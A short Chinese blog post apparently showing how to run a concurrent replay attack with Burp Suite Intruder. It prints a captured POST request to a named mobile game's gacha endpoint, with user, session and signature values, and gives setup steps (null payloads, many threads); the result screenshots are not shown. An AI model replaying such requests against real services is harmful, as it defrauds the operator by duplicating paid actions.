BurpSuite 并发重放攻击示例
我们看看原始的请求send to Intruder后,他会自动给你设置postion,我的例子一共有10个,如下所示(攻击的时候会将1-10的postion替换为空,而我要的效果是重放并发攻击,所以后面去掉了$):
POST /ep108/gacha/play?p=§a§&mv=§1066§&id=§eb0b9fe3635d975610§&u=§626052202§&t=§1647141472§&lang=§Zh§ HTTP/1.1
Content-Type: application/json
Content-Length: 135
Host: gl-game.tsubasa-dreamteam.com
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.12.1
[{"gacha_product_info_id":§16481§,"play_count":§10§,"selected_category":§1§,"mixer_materials":[]},"§563b240f041a8be5280fb162a1448d56bbc6e30d§"]
然后攻击的时候,clear 这些变量:
使用sniper攻击,选择null payloads:
设置攻击线程:
开始攻击后的结果:
标签:
安全分析
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
2019-03-13 Wireshark 过滤 基本语法
2018-03-13 leetcode 226. Invert Binary Tree
2018-03-13 python utc时间转换为strftime